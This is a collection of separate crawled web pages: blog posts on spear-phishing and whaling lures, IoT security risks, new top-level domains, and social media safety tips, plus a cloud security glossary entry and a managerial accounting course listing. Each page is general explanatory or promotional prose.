- Requests for donations from charities that are in the recipient’s sphere.
- Fake notifications about copyright infringement on YouTube, Tik Tok, etc.
- Attachments like brochures or notices from trusted sources like a government agency.
- Spoofed messages from the recipient’s regular service providers, suppliers or other vendors.
Spear-phishing is the most common vector for business email compromise attacks, the most expensive cyberattack a business can suffer. This attack is commonly used to capture credentials, steal information, cause a data breach and deploy malware including ransomware. The open rate for spear phishing emails is about 70%. Even worse, a report by FireEye shows that 50% of recipients who open spear phishing messages click on a malicious link inside.
Learn the secret to ransomware defense in Cracking the RANSOMWARE Code. GET BOOK>>
Whaling (CEO Fraud or Executive Phishing)
Whaling, sometimes known as CEO fraud or executive phishing, is a highly specialized spear-phishing attack that is crafted to perfectly imitate a company executive, or alternately, to fool a company executive into thinking that the message is from a trusted source.
To lure an executive or privileged employee into performing an action like supplying their credentials, giving the bad guys sensitive information or transferring money. Cybercriminals often use spoofed messages and conversation hijacking in this scenario to convince executives that they are a trustworthy business associate or a representative of an organization that the executive trusts.
Highly specific lures are crafted using personalized information about the target gathered from publicly available sources, harvested from social media sites and obtained from dark web markets and data dumps. Sometimes the cybercriminals will leverage a legitimate email account gained through BEC. These lures can include:
- Social media alerts or direct messages from sites like LinkedIn, Facebook, Twitter, What’s App, etc.
- Emails from the recipient’s bank, credit card company or a similar source
- Invoices from contractors or freelancers
- Updates from a software vendor
- Charitable donation requests
- Fake political emails from candidates or parties
- Attachments like brochures or notices from trusted sources like a government agency
- Spoofed messages from the recipient’s regular service providers, suppliers or other vendors
- Falsified event invitations
- New messages in old conversations
Whaling and CEO fraud aren’t the most frequently conducted types of phishing because each operation requires extensive research and a high level of skill in crafting and delivery. Bad actors will frequently use brand impersonation in these attacks and usually favor posing as Zoom, Amazon and DHL.
Looking for a security rockstar? Get 5 superstar benefits at 1 low price! SEE THE BENEFITS>>
Get Affordable Email Security That Can Handle Every Phishing Threat
Graphus’ AI-powered email security is a powerful defense against phishing threats like these. Compared to built-in email protection or a SEG, automated, API-based email security solutions like Graphus prevent 40% more spear phishing messages from reaching an employee’s inbox. Here’s how:
- TrustGraph is a powerful shield between employee inboxes and malicious messages. This proprietary technology uses more than 50 distinct data points to discover sophisticated phishing messages, even zero-day attacks.
- EmployeeShield displays a bright, prominent box on suspicious messages, reminding them to be cautious. Employees can designate a message as genuine or malicious with a single click.
- Phish911 makes it simple for employees to report any message that they don’t think is safe. When an employee reports a potentially malicious email, the message is immediately removed from everyone’s inboxes.
Let us show you how you can stop phishing immediately with Graphus – the most simple, automated and affordable phishing defense available today. | <urn:uuid:c7607697-1fc5-44e5-911f-e205c8983ce2> | CC-MAIN-2024-38 | https://www.graphus.ai/blog/inside-3-specialized-phishing-attacks/ | 2024-09-09T18:35:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00177.warc.gz | en | 0.916791 | 1,605 | 2.515625 | 3 |
The Internet of Things (IoT) has revolutionised the way we interact with technology and the world around us. From smart homes to wearable devices, IoT has brought about unprecedented convenience and efficiency.
However, with this new era of connectivity comes a host of security and privacy issues that need to be addressed. As more data is generated from these connected devices, it’s crucial to understand the potential risks involved in IoT-generated big data.
In this blog post, we’ll explore some of the most pressing IoT security issues and how they can be mitigated through powerful IoT security solutions and best practices.
Building trust in IoT devices is essential to ensure that consumers feel comfortable using these innovative technologies. In the absence of effective security measures, malicious actors can easily exploit the vulnerabilities present in IoT systems and steal sensitive data or gain unauthorised access.
One way to combat this issue is through powerful IoT security solutions designed to protect connected devices from a range of potential threats. These solutions include firewalls, intrusion detection systems (IDS), encryption tools, and other specialised software that can detect and block unauthorised network traffic.
In addition, regular firmware updates are critical for ensuring that devices remain secure over time since many vulnerabilities are discovered after products hit the market. By updating firmware regularly, manufacturers can patch any known bugs or weaknesses before they become exploited by attackers.
By building trust in IoT-connected devices through robust security measures such as these, manufacturers can help users reap all of the benefits offered by these technologies without having to worry about their safety or privacy being compromised.
Software and firmware vulnerabilities in IoT devices are among the top concerns of security experts. These vulnerabilities can be exploited by hackers to gain unauthorized access to sensitive information or even take control of the device.
One common vulnerability is outdated software and firmware. Many IoT devices use old versions that have not been updated with new patches, leaving them susceptible to known exploits.
Another issue is poor coding practices that leave code open to exploitation. Developers need to follow best practices when writing code for IoT devices, including regular testing and updates as needed.
Additionally, some IoT devices may have backdoors intentionally built into their firmware for debugging purposes. However, these backdoors could also be used by attackers to bypass security measures.
To address these issues, it’s important for developers and manufacturers of IoT devices to prioritise security in their design processes. Regularly updating software/firmware, implementing secure coding practices, and minimising the use of backdoors are all crucial steps towards building a more secure environment for connected devices.
To build trust in IoT connected devices, it’s crucial to understand the importance of security measures. Consumers need to have confidence that their personal data and privacy are well-protected when using a connected device.
One way to build trust is by providing clear and concise information about how the device collects and uses data. This transparency can help ease concerns about potential misuse or unauthorized access.
Another important factor in building trust is ensuring that software updates are regularly released to address any vulnerabilities or bugs. Users want assurance that their device remains secure even as new threats emerge.
Manufacturers can also build trust by implementing strong authentication measures such as two-factor authentication or biometric identification. These additional layers of security can prevent unauthorised access and give users peace of mind.
Building trust in IoT connected devices requires a collaborative effort between manufacturers, developers, and consumers alike. By prioritising security measures, providing transparent information, and implementing robust authentication protocols, we can ensure that our data remains protected while still enjoying the benefits of these innovative technologies.
With the increasing usage of IoT devices, it is important to understand the security risks that these devices pose. The nature of IoT systems means that there are a number of potential security vulnerabilities, in terms of both software and hardware.
One key risk factor is the use of default passwords or weak authentication mechanisms on IoT devices. This makes them easy targets for hacking attempts, allowing hackers to take control over these vulnerable devices.
Another major risk factor is lack of encryption on data transfer from an IoT device to its network. This can potentially expose sensitive information about users or businesses, making them vulnerable to cyber-attacks.
In addition, many IoT systems have outdated firmware which can be exploited by attackers through known vulnerabilities and weaknesses. Moreover, the shared access point between different connected smart devices could lead to further vulnerability as this increases the attack surface area for intruders.
It’s also worth noting that insufficient testing during development phases might leave some bugs unnoticed until they’re deployed in real-life scenarios. Hence rendering any protective measures ineffective when deployed against zero-day attacks.
Understanding these risks highlights how vital it is for organizations and individuals alike to prioritise implementing strong security measures when setting up their IoT networks and connected devices – before it’s too late!
Addressing IoT security challenges is crucial for building trust in these connected devices. One of the key challenges is software and firmware vulnerabilities, which can be exploited by hackers to gain access to sensitive data or control over an IoT system.
To address this challenge, manufacturers must prioritise regular software updates and patches, as well as implement secure development practices that minimise the risk of introducing vulnerabilities in new releases.
Another critical challenge is data leaks from IoT systems. To prevent such breaches, it’s important to implement robust encryption protocols that protect sensitive information both during transit and storage. This requires a comprehensive approach that considers all aspects of data handling across the entire IoT ecosystem.
Malware risks are also a significant concern for organizations leveraging IoT systems. Addressing this challenge involves implementing endpoint security solutions that detect and remove malware threats before they can compromise device functionality or steal sensitive information.
Additionally, shared network access can introduce security risks if not properly secured. Organizations must deploy strong authentication mechanisms like multi-factor authentication (MFA) or digital certificates to ensure only authorized users have access to networks where connected devices operate.
Inconsistent security standards across different regions also pose a major challenge for securing IoT devices globally. Manufacturers should work with industry associations and regulatory bodies to develop common standards based on best practices in order to promote greater consistency in global cybersecurity regulations governing these technologies.
One of the most critical risks associated with IoT devices and big data is data leaks. With so much sensitive information being collected by these systems, any breach in security could have severe consequences for individuals and organizations alike.
Data leaks can occur in many ways, from a cybercriminal hacking into an insecure device to an employee accidentally sharing confidential information. The problem is exacerbated by the fact that IoT devices often collect vast amounts of data, making it difficult to identify when a leak has occurred.
Unfortunately, many companies prioritise convenience over security when designing their IoT systems. This leads to poor encryption practices and vulnerabilities that hackers can easily exploit.
To mitigate the risk of data leaks from IoT systems, businesses must take proactive measures such as implementing robust encryption protocols, limiting access privileges to sensitive data, and conducting regular vulnerability assessments.
Ultimately, preventing data leaks requires a comprehensive approach that addresses both technical vulnerabilities and human error. By taking steps to secure their IoT systems now before breaches occur will help companies avoid costly legal battles down the line while also protecting customer privacy.
One of the most significant IoT security issues is malware risks. Malware can infiltrate an IoT network and infect multiple devices, making it easier for hackers to steal sensitive data or even take control of the connected devices themselves.
Malware typically enters an IoT system through vulnerabilities in software and firmware, which underscores why keeping all systems up to date with patches is critical. But some malware may also be capable of exploiting physical vulnerabilities in a device’s hardware, such as weak password protections.
Having robust anti-virus measures on all connected devices can help protect against malware attacks, but this approach alone isn’t enough. Instead, security professionals need to adopt a layered approach that includes firewalls and intrusion detection systems to prevent unauthorised access from outside the network.
Another way to mitigate malware risks is by using encrypted communication protocols between all devices on the network. This ensures that any data transmitted between them remains secure even if attackers manage to intercept it.
Dealing with malware threats in IoT networks requires a multi-faceted approach that begins with regular updates and ends with thorough risk assessments and implementing appropriate cybersecurity solutions.
Shared network access is another IoT security issue that we cannot ignore. When multiple devices share a single network, they also share the same vulnerabilities and risks. A hacker can easily breach one device and gain access to all others on the shared network.
This type of attack is especially dangerous in public places such as hotels or coffee shops where people connect their personal devices to unsecured networks. In addition, many IoT devices lack sufficient authentication measures making them more vulnerable to attacks.
The situation becomes even worse when employees bring their own IoT devices into work environments with unprotected shared networks. This can potentially expose sensitive company information and create more significant security issues for businesses.
To address this problem, it’s essential to employ proper network segmentation techniques to separate critical systems from less secure ones. Additionally, using strong passwords and reliable encryption methods can help protect against unauthorised access attempts.
One of the major challenges in securing IoT devices is the lack of industry foresight. Many manufacturers prioritise speed to market over security, leading to vulnerable and easily hackable devices. In some cases, companies may not even consider cybersecurity until after a breach has occurred.
This lack of foresight can be especially problematic when it comes to firmware updates and patching vulnerabilities. While software updates are common for traditional computing systems, many IoT devices lack this capability or may require manual intervention from the user.
Another issue with industry foresight is that many companies fail to anticipate future threats and emerging attack vectors. As new technologies such as 5G networks continue to emerge, there will likely be new security threats that must be addressed proactively rather than reactively.
Ultimately, addressing these issues requires a shift in priorities within the industry towards proactive security measures rather than simply reacting once an incident occurs. This includes investing in research and development for secure IoT technologies as well as establishing partnerships between manufacturers and cybersecurity experts to ensure comprehensive solutions are developed from the outset.
In today’s digital age, Internet of Things (IoT) devices embedded systems have become an integral part of our daily lives. However, with the rise in IoT adoption comes the increasing need for security measures to protect these devices and their users. Here are some tips on how to protect your IoT systems and devices from cyber threats.
Firstly, it is essential to keep all software and firmware up to date with regular patches and updates. This will help address any identified vulnerabilities that can be exploited by hackers.
Secondly, always use strong passwords when setting up your IoT device accounts. Use a combination of upper and lower-case letters, numbers, symbols, as well as avoiding common words or phrases.
Thirdly, consider existing security mechanisms for implementing multi-factor authentication (MFA) such as biometric authentication or SMS verification for added security layers.
Fourthly, limit access to your network only to authorized personnel and ensure that each device is connected securely using encryption protocols such as HTTPS or SSL/TLS.
Lastly but not least important: regularly monitor your IoT networks for unusual activity patterns that could indicate potential breaches or attacks. By being proactive instead of reactive when it comes to cybersecurity threats you can stay ahead of malicious actors who target vulnerable systems through unsecured connections.
Inconsistent security standards are a major issue in IoT security. The lack of standardised security protocols means that IoT devices are often left vulnerable to cyberattacks. Different manufacturers may have different approaches to securing their devices, which can make it difficult for consumers to assess the level of protection provided.
This inconsistency also makes it challenging for developers and IT professionals who need to integrate multiple systems with varying levels of security into a cohesive network environment. This can lead to weaknesses in the overall system as well as vulnerabilities that hackers can exploit.
Without consistent standards, there is no way to ensure that every device is secure or even capable of being secured. Some products may be inherently more vulnerable than others due to design flaws or outdated software. It’s essential for industry leaders and regulatory bodies to work together on establishing clear guidelines and best practices for IoT security.
Until these standards are established, companies must take extra precautions when deploying IoT devices and networks by implementing additional measures such as firewalls, intrusion detection systems, encryption protocols, and regular updates/patches. Ultimately, inconsistent security standards put consumers at risk while making it easier for criminals to penetrate corporate networks through these connected endpoints.
When it comes to IoT Security, the best approach is always prevention. Below are some of the best practices that can help you keep your IoT devices secure:
By following these best practices along with regular vulnerability assessments and penetration testing you can help protect yourself against most common cyber threats targeting IoT devices today.
The rise of IoT-enabled vehicles has brought about a new level of convenience and luxury for drivers. However, it also poses significant dangers when security is compromised. With the increasing number of connected cars on the roads, hackers are finding more ways to exploit vulnerabilities in these systems.
Hackers can potentially access sensitive data such as personal information, location history and even control over key vehicle functions like brakes or steering. In 2015, researchers successfully hacked into a Jeep Cherokee’s entertainment system remotely and took control of the vehicle from miles away.
Moreover, with the advent of autonomous driving technology where a car relies solely on sensors and algorithms to drive itself without human intervention, there is an even greater need for robust security measures to be put in place before mass adoption.
To mitigate risks associated with hackable vehicles, automakers must ensure that their systems are secure by design. This means incorporating encryption protocols into all communication channels within the vehicle network and conducting regular software updates to patch any identified vulnerabilities.
Additionally, governments must enforce strong regulations around cybersecurity standards for connected vehicles. As we move towards a future where driverless cars will become ubiquitous on our roads, ensuring smart transportation infrastructure will be an urgent priority to protect consumers’ safety both online and offline.
One of the most significant IoT security issues is the lack of firmware updates for IoT devices. Many manufacturers do not provide regular firmware updates to patch any vulnerabilities discovered in their systems, making them an easy target for attackers.
Without regular firmware updates, IoT devices can become a serious threat to users’ privacy and security. Attackers can exploit unpatched vulnerabilities to gain unauthorised access to sensitive data or even take control of the device itself.
Furthermore, some IoT devices are designed with limited memory and limited processing power, which makes it difficult for manufacturers to provide timely software patches or upgrades when needed.
The responsibility lies both with manufacturers and consumers when it comes to updating firmware on IoT devices. Manufacturers should ensure that they release regular firmware updates, while consumers should regularly check for and install these updates on their connected devices.
Missing firmware updates pose a significant risk in terms of cyber-attacks against vulnerable IoT systems. It is essential that all stakeholders work together towards implementing reliable solutions that address this issue before it leads to major cybersecurity incidents.
Network security is a significant concern when it comes to IoT devices, as they are often connected to the internet of things security, and other devices. These connections create entry points for hackers who can compromise the entire network through a single weak link.
One of the biggest issues with IoT networks is that many devices lack proper authentication protocols or encryption methods, making them vulnerable to unauthorised access. The use of default passwords or no password at all on these devices also makes them easy targets.
Another issue is that many IoT devices communicate using unsecured protocols, which means that sensitive data transmitted over the network could be intercepted and compromised. This includes personal information like login credentials or financial data.
To address these risks, it’s crucial that IoT networks implement strong security measures such as firewalls and intrusion detection systems (IDS). Network segmentation can also help by separating different types of traffic into separate subnets.
It’s important to note that securing an IoT network isn’t just about protecting individual devices but rather creating a comprehensive security strategy for the entire ecosystem. Regular monitoring and updating of software and firmware are essential in maintaining a secure network environment.
APIs play a critical role in the functioning of IoT systems, allowing devices to communicate with each other and share data. However, this also makes them vulnerable to security breaches if not properly secured.
One common issue is the lack of authentication and authorisation protocols for APIs. Unsecured APIs can allow unauthorised access and manipulation of sensitive data, leading to potential privacy violations or even theft.
Another concern is the potential for API attacks through injection or exploitation techniques such as SQL injection or cross-site scripting (XSS). These attacks can be used by hackers to gain access to an entire system or network, causing significant damage.
To prevent these types of attacks, it’s crucial that API providers implement proper security measures such as encryption and strict authentication requirements. Regular monitoring and testing should also be conducted to ensure ongoing protection against new threats.
In summary, API security should be a top priority for any organisation utilising IoT devices. By taking proactive steps towards securing their APIs, businesses can help safeguard against cyber threats while ensuring data privacy and integrity are maintained.
Physical vulnerabilities are often overlooked when it comes to IoT security, but they can be just as dangerous as digital threats. These vulnerabilities refer to the physical access points that could be exploited by malicious actors to gain unauthorised access to IoT devices or systems.
One of the most common physical vulnerabilities is unsecured network ports on IoT devices. These ports may allow attackers to connect directly to the device and execute commands without any authentication requirements. Another vulnerability is weak passwords or default login credentials that could easily be guessed or found online.
In addition, there are also risks posed by tampering with hardware components in such devices as sensors, cameras, and microphones. Malicious actors could physically manipulate these components to harvest sensitive data or even disrupt a device’s functionality altogether.
To mitigate these physical vulnerabilities, it’s important for organizations and individuals alike to implement robust physical security measures such as locking cabinets and rooms where IoT devices are stored, maintaining strict control over who has access to these areas, and regularly inspecting devices for signs of tampering.
By taking proactive steps towards securing both the digital and physical aspects of their IoT systems and devices, individuals and organizations can significantly reduce their risk of falling victim to cyber-attacks.
There have been several high-profile IoT security breaches in recent years. One of the most notable incidents was the 2016 Mirai botnet attack, which targeted internet-connected devices such as routers and cameras to carry out distributed denial-of-service (DDoS) attacks.
In another instance, a casino was hacked through an internet-connected thermometer installed in a fish tank in their lobby. The hackers were able to gain access to the casino’s network and steal sensitive data from their high-roller database.
Similarly, a vulnerability was discovered in Ring doorbells that allowed hackers to intercept video footage and audio recordings from users’ homes. This breach raised concerns about privacy violations and led to calls for better security measures for smart home devices.
IoT security breaches can also have serious consequences beyond just data theft or privacy violations. In 2015, hackers remotely accessed and took control of a Jeep Cherokee while it was being driven on a highway, demonstrating the potential danger of hackable vehicles.
These examples highlight the need for strong IoT security measures to protect secure devices against cyberattacks and ensure user safety.
Ensuring the security of IoT devices has become a major concern for both consumers and businesses. The lack of consistent security standards across different IoT devices and platforms has made it difficult to implement effective cybersecurity measures. This is where IoT security standards and legislation come into play.
Several organizations have developed their own set of guidelines for securing IoT devices, such as the Internet Society’s Online Trust Alliance (OTA) framework or NIST’s Cybersecurity Framework. These frameworks provide a comprehensive approach to managing cybersecurity risks in an organisation’s infrastructure.
In addition to industry-led efforts, governments around the world are also taking steps towards developing regulations regarding IoT security. For instance, in California, manufacturers must equip all connected devices with “reasonable” security features starting January 1st, 2020 under SB-327.
While these developments are promising, there is still work that needs to be done. Many countries do not yet have any specific laws or regulations concerning IoT device security which may lead to inadequate protection against cyber-attacks on connected systems.
As we continue our journey towards an increasingly interconnected world through various forms of technology like AI-powered robots and self-driving vehicles – it becomes imperative that manufacturers prioritise building secure products from the start rather than leaving it open for potential breaches later.
One of the biggest security challenges facing IoT devices is the gap between mobile networks and cloud servers. Mobile networks often lack the necessary security measures to protect data transmitted from connected devices.
This becomes a problem when sensitive information, such as personal health records or financial data, is being shared across these networks. Hackers can easily intercept this data if it’s not properly secured.
The cloud also presents its own set of challenges. While cloud servers are generally more secure than mobile networks, they’re still vulnerable to attacks like DDoS (distributed denial-of-service) where hackers flood the server with traffic until it crashes.
To address this issue, IoT device manufacturers need to implement strong encryption protocols and ensure that all communication between devices and servers is encrypted. They should also work closely with network providers to develop stronger security measures for mobile networks.
It’s important for consumers to be aware of these gaps in security and take steps to protect themselves by using secure passwords, keeping firmware up-to-date, and avoiding public Wi-Fi when transmitting sensitive information from their IoT devices.
One of the major IoT security issues is limited device management. With the rapid growth of IoT devices, it’s becoming increasingly challenging to manage and control them effectively.
Limited device management refers to a scenario where there are too many connected devices with different operating systems, firmware versions, and security protocols that make it difficult for IT teams to monitor all of them efficiently.
Additionally, as new vulnerabilities emerge within these devices, they need to be updated or patched regularly which can be cumbersome for those responsible for their management.
Without proper visibility into each device on a network and its current status in terms of patching levels and compliance standards; an organisation may not know what kind of threat vectors exist or how they could cause damage if exploited by malicious actors.
To address this challenge requires organizations to deploy effective endpoint protection solutions that can help detect potential threats before they become catastrophic. These solutions should also include automatic updates so that patches are applied quickly without requiring manual intervention from administrators.
Physical security is an often overlooked aspect of IoT security, but it’s just as important as any other. Physical access to an IoT device can allow for unauthorised tampering or data theft.
One example of a physical vulnerability is the lack of locks on server cabinets or unsecured storage locations for devices. This puts them at risk from anyone who has physical access to the area they are stored in.
Another issue with physical security arises when employees leave their workstations unlocked and unattended, allowing others to gain access to sensitive information stored on their devices.
To mitigate these risks, it’s essential that organizations establish clear policies and guidelines around physical security measures, such things security as locking cabinets and using secure employee identification systems.
Moreover, regular training sessions should also be conducted with employees regarding the importance of maintaining physical security measures within the workplace environment.
In short, ensuring proper physical security controls must be implemented alongside standard IT procedures which will help prevent unauthorised people from accessing critical assets and keeping valuable data safe from prying eyes.
Remote access is a fundamental aspect of Internet of Things (IoT) devices. It allows users to remotely connect and interact with their IoT device from anywhere in the world, which is both convenient and efficient. However, remote access can also be a security risk if not properly secured.
Hackers can exploit vulnerabilities in remote access protocols to gain unauthorised access to an IoT system. Once they have gained entry, they can steal sensitive data or even take control of the entire network.
To prevent this from happening, it’s essential that you implement proper remote access security measures on your IoT devices. One way to do this is by using strong encryption techniques like Transport Layer Security (TLS).
Additionally, implementing multi-factor authentication can help reduce the risk of unauthorised login attempts. This requires users to provide additional information beyond just their username and password before being granted access.
Regularly monitoring your network traffic for suspicious activity can help detect any potential breaches early on so that you can take immediate action.
Ensuring proper remote access security will go a long way in securing your IoT systems and protecting them against cyber threats.
Encrypted data transfer is one of the most important aspects of IoT security. It involves encrypting data before it is transmitted between devices or to a remote server, so that even if an attacker intercepts the data, they cannot read its contents without the encryption key.
Encryption algorithms are used to protect the confidentiality and integrity of data as it moves across networks. These algorithms use complex mathematical operations to scramble data into unreadable code, which can only be decoded using a secret encryption key.
There are several protocols for encrypted data transfer in IoT systems such as Transport Layer Security (TLS) and Secure Sockets Layer (SSL). These protocols provide secure communication channels by encrypting all traffic between devices and servers.
However, implementing encrypted data transfer can be challenging due to factors such as limited device resources, network latency and compatibility issues with other protocols. Therefore, developers need to carefully consider which encryption protocol and algorithm best fit their specific application needs while maintaining performance efficiency.
Incorporating encrypted data transfer into IoT systems is crucial for protecting sensitive information from unauthorised access or tampering.
In the rapidly evolving world of IoT, security and privacy issues continue to pose significant challenges. But these risks can be managed with powerful IoT security solutions that address vulnerabilities such as software and firmware weaknesses, data leaks, malware risks, inconsistent security standards and more.
By implementing strong security measures like network-based firewalls, encrypted data transfer protocols, physical device protection and remote access controls, we can ensure the safety and integrity of our IoT systems. It’s also important for industry leaders to adopt a unified approach towards setting standard guidelines for IoT devices’ manufacturing process prioritise security.
At the end of the day, it’s up to us all – manufacturers, developers, and users alike – to understand the risks associated with connected devices so that we can build trust in IoT technology while keeping our personal information safe from harm. By taking responsibility today for securing tomorrow’s digital landscape through better collaboration on developing secure frameworks across all stakeholders is necessary if we want successful growth in this new era of innovation. | <urn:uuid:7e7b7091-16b8-41e5-a0a2-0967165d3e52> | CC-MAIN-2024-38 | https://deviceauthority.com/security-and-privacy-issues-in-iot-generated-big-data/ | 2024-09-13T07:56:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00777.warc.gz | en | 0.943884 | 5,600 | 3.015625 | 3 |
What is a TLD?
“A top level domain (TLD) is one of the domains at the highest level in the hierarchical Domain Name System of the Internet.”
— Wikipedia – http://en.wikipedia.org/wiki/Top-level_domain
The best example of a TLD is the most common, popular and well known TLD: .com.
In the example of www.alpineweb.com, the .com portion is the Top Level Domain. It follows then that alpineweb.com is a second level domain and www.alpineweb.com is a third level domain.
So why are there new TLD’s?
The short answer is to increase your website naming options.
The king of TLD’s, .COM is approaching it’s 30th birthday and many of the most common and valuable domain names are already registered. For many business owners finding a suitable domain name is difficult and often requires a less than optimal compromise.
Many new TLD’s are specific to interests, locations and industry. Your web address can let people know what you do or where you might do it. Unique and memorable TLD’s are easy to remember and can make it easy for your website to be found online.
With hundreds of TLD’s now available and more being introduced every year, now is the time to acquire the perfect domain for you, your organization or business.
Some examples of new TLD’s are:
AlpineWeb will be adding new TLD’s on a monthly basis and will occasionally offer promotional pricing.
Choosing New Domain Names
Finding the right Domain Name is essential. Seek a Domain Name that is easy to remember, easy to spell and specific to your website.
Using real words rather than alternative spellings or made up names is more effective in being found online.
To Search for your new TLD visit the Domain Checker page: | <urn:uuid:33aa4172-5c6d-4f7c-97cc-7d793b5d892a> | CC-MAIN-2024-38 | https://www.alpineweb.com/news/did-you-know-there-are-new-tlds-available/ | 2024-09-17T01:11:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00477.warc.gz | en | 0.904967 | 413 | 2.71875 | 3 |
Phishing attacks occur when cybercriminals trick their victims into sharing personal information, such as passwords or credit card numbers, by pretending to be someone they’re not.
Updated on August 19, 2024.
Social media plays a vital role in allowing people from all over the world to communicate almost instantly; however, it’s important to ensure your social media accounts are safe from cybercriminals and other individuals with malicious intent.
Here are seven tips to help you stay safe on social media.
1. Use strong passwords
Cyber attacks are growing in complexity and frequency, which makes your password choice more important than ever. To avoid you social media accounts from getting hacked it’s important to secure them with strong passwords.
Here are some tips to help ensure your passwords are strong:
- Include a combination of letters, special characters and numbers
- Make your password a minimum length of 16 characters
- Avoid any personal information that can be found online, such as your birthday, school, family members or your dog’s name
- Avoid reusing the same password or variations of the same password across multiple accounts
- Use a password manager to create and store strong, unique passwords in a secure vault
2. Enable Multi-Factor Authentication (MFA)
Multi-factor authentication is important to enable on your online accounts since it adds additional layers of security. For example, if someone were to find out what your Instagram password is, having MFA enabled on your account would prevent them from being able to gain access to it. This is because they’d have to verify your identity, which they won’t be able to do.
Here are some types of MFA to consider adding to your accounts:
- Authenticator apps: An authenticator app generates Time-based One-Time Password (TOTP) codes every 30-60 seconds. To verify your identity using this type of MFA, you just copy and paste the TOTP code from the authenticator app into the login portal after entering your password.
- Hardware security keys: Hardware security keys are USB-like devices that are used to verify your identity by tapping or inserting it into your device.
- SMS and email tokens: SMS and email tokens are one of the most popular methods of authentication because they’re ease-of-use. This type of MFA is when you receive a TOTP code through text message or email and input that code into the login portal after inputting your password.
3. Be selective with your friend and follow requests
When it comes to social media, it’s important to be cautious of the people you let follow your accounts. If you don’t know the person sending your a friend or follow request, it’s safer to decline their invitation. This is because it could be a fake account attempting to obtain your personal information by browsing your profile or someone attempting to stalk or harass you.
4. Don’t post personal information
While it’s tempting to share personal information about your life on social media, avoid from publishing critical personal information, such as your home address, credit card number or phone number as this could be used to steal your identity. A best practice is avoid oversharing on social media, so no one with malicious intent can easily steal your identity.
5. Don’t share your travel plans before they happen
It’s common for people to post their vacations on social media. After all, is it really a vacation if you don’t document it on Instagram? If you post about your future travel plans on social media, someone could target your home since they’re aware that you’ll be gone for a period of time. To prevent this from happening, avoid sharing your geolocation when traveling and always share the least amount of information possible as you don’t know who could be watching your activity through your posts. If you are traveling and want to post about it, the safest thing to do is post your vacation pictures when you’re back home.
6. Be cautious of phishing attempts
Phishing is when cybercriminals try to get you into revealing personal information by pretending to be someone they’re not. When cybercriminals carry out phishing attacks on social media, they often send you direct messages containing malicious links with a message urging you to click on them. Clicking these links can lead you to websites that look legitimate but are designed to steal your information or immediately infect your device with malware. To avoid from falling victim to these phishing attempts it’s important to be aware of them and learn to spot them.
Some common indicators of phishing include:
- Urgent language
- Being threatened with serious consequences
- Offers that seem too good to be true
- Unsolicited messages containing links and attachments
- Misspellings and grammatical errors
- Being asked for your personal information
7. Use the strongest privacy settings
Addionatly, you should also ensure that you use the strongest privacy settings on your social media accounts. Some settings you should consider enabling include:
- Privating your profile
- Hiding your friend or follow list
- Hiding your posts from the public
- Disabling searchability in Google and other search engines
Protect your social media accounts
The posts you make on your social media accounts can affect your digital footprint and make it easier for cybercriminals to target you. However, by taking steps to secure your social media accounts you can help keep your information safe while also continuing to enjoy your social media apps like you usually do.
Curious to see how a password manager helps you secure your social media accounts? Start a free 30-day trial of Keeper® today. | <urn:uuid:d085c4fb-1f31-4746-a961-878312d96bf0> | CC-MAIN-2024-38 | https://www.keepersecurity.com/blog/2022/09/27/7-tips-for-staying-safe-on-social-media/ | 2024-09-18T08:25:56Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00377.warc.gz | en | 0.92532 | 1,189 | 2.96875 | 3 |
Cloud security is the practice of protecting cloud-based systems, applications, and data from various types of cyber threats such as unauthorized access, data breaches, and data loss. Cloud security involves implementing specialized security controls and technologies to safeguard cloud environments from various types of attacks such as Distributed Denial of Service (DDoS) attacks, malware attacks, and phishing attacks.Cloud security is critical for ensuring the confidentiality, integrity, and availability of cloud-based resources. Confidentiality refers to preventing unauthorized access to sensitive data, integrity refers to ensuring that data remains unchanged and accurate, and availability refers to ensuring that cloud-based resources are accessible when needed.Some of the key components of cloud security include access control, data encryption, identity and access management, security monitoring, and incident response. Access control is the process of controlling and managing access to cloud resources, typically through the use of user authentication, authorization, and permissions. Data encryption involves the use of encryption algorithms to protect data from unauthorized access. Identity and access management (IAM) involves managing user identities and their access privileges to cloud resources. Security monitoring involves continuously monitoring cloud environments for potential threats and incidents. Incident response involves the process of responding to and managing security incidents and breaches.To ensure effective cloud security, organizations should adopt a risk-based approach to identify and prioritize their security needs. They should also ensure that their cloud security strategy aligns with their overall business objectives, comply with industry regulations and standards, and engage in regular security assessments and testing. | <urn:uuid:4e1e0954-8243-42ec-baa4-723c92856df7> | CC-MAIN-2024-38 | https://www.kudelski-iot.com/glossary/cloud-security | 2024-09-07T10:23:02Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00541.warc.gz | en | 0.943323 | 303 | 3.15625 | 3 |
Creator: University of Virginia
Category: Software > Computer Software > Educational Software
Topic: Business, Finance
Tag: benefits, costs, decision, decisions, profit
Availability: In stock
Price: USD 79.00
This course, developed at the Darden School of Business at the University of Virginia and taught by top-ranked faculty, will teach you the fundamentals of managerial accounting including how to navigate the financial and related information managers need to help them make decisions.
Interested in what the future will bring? Download our 2024 Technology Trends eBook for free.
You'll learn about cost behavior and cost allocation systems, how to conduct cost-volume-profit analysis, and how to determine if costs and benefits are relevant to your decisions. By the end of this course, you will be able to: – Describe different types of costs and how they are represented graphically – Conduct cost-volume-profit analyses to answer questions around breaking even and generating profit – Calculate and allocate overhead rates within both traditional and activity-based cost allocation systems – Distinguish costs and benefits that are relevant from those that are irrelevant for a given management decision – Determine a reasonable course of action, given the financial impact, for a given management decision | <urn:uuid:bfe9c5c3-9989-4123-988f-e885a2e472f0> | CC-MAIN-2024-38 | https://datafloq.com/course/managerial-accounting-fundamentals/ | 2024-09-08T16:26:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00441.warc.gz | en | 0.932975 | 250 | 2.828125 | 3 |
